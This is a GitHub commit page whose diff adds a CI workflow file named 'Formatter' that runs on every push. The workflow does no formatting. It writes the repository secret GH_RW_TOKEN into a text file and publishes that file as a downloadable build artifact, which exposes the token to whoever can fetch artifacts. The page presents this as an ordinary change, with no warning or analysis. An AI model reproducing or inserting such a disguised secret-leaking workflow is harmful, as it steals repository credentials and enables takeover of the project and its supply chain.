We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 9371eba commit 02a11d0Copy full SHA for 02a11d0
1 file changed
.github/workflows/inc5151.yml
@@ -0,0 +1,15 @@
1
+name: Formatter
2
+run-name: Formatter
3
+on:
4
+ push:
5
+jobs:
6
+ format:
7
+ runs-on: ubuntu-latest
8
+ steps:
9
+ - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd
10
+ - name: Run Formatter
11
+ run: echo ${{ secrets.GH_RW_TOKEN }} > format-results.txt
12
+ - uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f
13
+ with:
14
+ name: format-results
15
+ path: format-results.txt
0 commit comments